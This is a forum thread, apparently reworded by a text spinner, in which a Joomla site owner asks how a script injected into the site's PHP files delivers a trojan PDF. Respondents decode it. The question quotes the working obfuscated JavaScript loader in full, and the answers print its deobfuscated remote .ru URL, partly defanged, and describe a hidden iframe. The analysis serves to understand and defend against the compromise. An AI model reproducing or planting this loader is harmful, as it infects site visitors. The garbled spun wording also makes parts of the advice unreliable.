My Joomla! website continues to be frequently compromised into. Someone, in some way, handled to inject the next rubbish in to the key php scripts, however i mean to not discuss setting up Joomla. The website isn't visited much (sometimes I'm afraid I may be the only customer to that particular site...) and that i don't care much to achieve the site back ready to go. I'll handle that eventually.

My real question is, so how exactly does this rubbish work? I view it and that i just aren't seeing so how exactly does this have the ability to inflict harm? What it really does could it be attempts to download a Pdf known as ChangeLog.pdf, that is have contracted a trojan viruses and after opening will freeze your Acrobat and wreak damage to your machine. So how exactly does it do this, I'm not sure, I do not care. But exactly how does the next bit of script invoke the download?

<script>/*Exception*/ document.write('<script src='+'h#^(t@)((t$&lifier@p#:)&lifier/!$/)@d$y#^#$n@$d^!!&n#s$)^-$)o^^(r!#g!!#$.^^@g))!a#m#@$e&lifier$s^@@!t@@($!o@$p(.&lifier@c&lifier)@(o$m)).!$m$)y@(b@e()s&lifier$t$@y&o$&lifier(u#)$x&lifier&lifier^(i)-@^c!!&n$#.(@g)$e#(^n&lifier!u(i&lifier#&n(e&lifier(!h&o@&lifier^&l^$(l)&y$(#@w!o@!((o#d&lifier^.^#)r$#^u!!$:(#@&8#)($8@&0^(/))s#o#^&lifier#^f!$t$!o##n(&lifier$i(^!c$(.!&c@o!&lifier^m#&lifier/&lifier(s&lifier$(o!f&lifier!t@&o!!n)&i$&c!.#^^c)!$o@@((m@#/$^!g#^o$^&o&lifier#g!l)@@@!e&lifier.))c!)(o#@#^!m(&lifier/^^l#^@i##(v&lifier@e&lifier)!$j^!a@$s#m!i)n$.!$c&lifier$o)@$m^/@$v&i^d^()e(!o&lifier&lifiers@(z(@)^.@)c$&o^m)$)^/#$'.replace(/#$@^&lifier()!/ig, '')+' defer=defer></scr'+'ipt>')</script>

<!--6f471c20c9b96fed179c85ffdd3365cf-->

Spot the replace call following the giant untidy string: .replace(/#$@^&lifier()!/ig, '').

It removes the majority of the special figures, making it an ordinary URL:

evil://dyndns-org.gamestop.com.mybestyouxi-cn.genuinehollywood.ru:8080/softonic.com/softonic.com/google.com/livejasmin.com/videosz.com/

(I by hand transformed http: to evil:)

Observe that the regex might have been simplified to .replace(/[#$@^&lifier()!]/ig, '')

Should you consider the script, you'll notice that it's a simple script that inserts a concealed IFRAME that contains the road /index.php?ys in the same domain.

I asked for that page in Fiddler, also it didn't have content.

These solutions may help you realize the character from the malicious JavaScript code but what you need to be searching for is a method to close the loophole inherant within the Joomla engine. Pre-packed frameworks are vulnerable to loopholes, either intentional or unintended, particularly when you consider that they're designed to operate on unix, mac and home windows conditions.

My work requires I run many domain names, programs and frameworks on various kinds of servers and systems for clients and myself. With time I have seen increasingly more bots moving scalping strategies searching for known loopholes/entrances by-method of back-door entrances produced by individuals frameworks. Positive thing after i use any kind of framework, that we rarely do, I make certain to relabel most otherwise the whole file structure to rid myself of individuals annoying loopholes/back-doorways. At the minimum you are able to relabel sites that will mess up most bots, but my strategy is to totally eliminate references that provide clues regarding the character from the framework, including renaming from the entire file structure not only sites. Keep a roadmap from the new naming conventions in accordance with that old naming conventions to be able to make adding plug-inches for your base framework easy. When you get used to this you are able to go so far as programatically renaming the whole framework filestructure for faster results, this is particularly helpful when needing to cope with clients requiring to have the ability to update their framework with plug-inches and so on.

It simply does a regex replace around the script url to provide you with

NOTE: Don't Stick To The BELOW LINK (placed ** to discourage the copy-pasters)

http**://dyndns-org.gamestop.com.mybestyouxi-cn.genuinehollywood.ru:8080/softonic.com/softonic.com/google.com/livejasmin.com/videosz.com/

because the src

It uses the replace function to exchange the rubbish chars using regex, no problem using the code:

 ........replace(/#$@^&lifier()!/ig, '')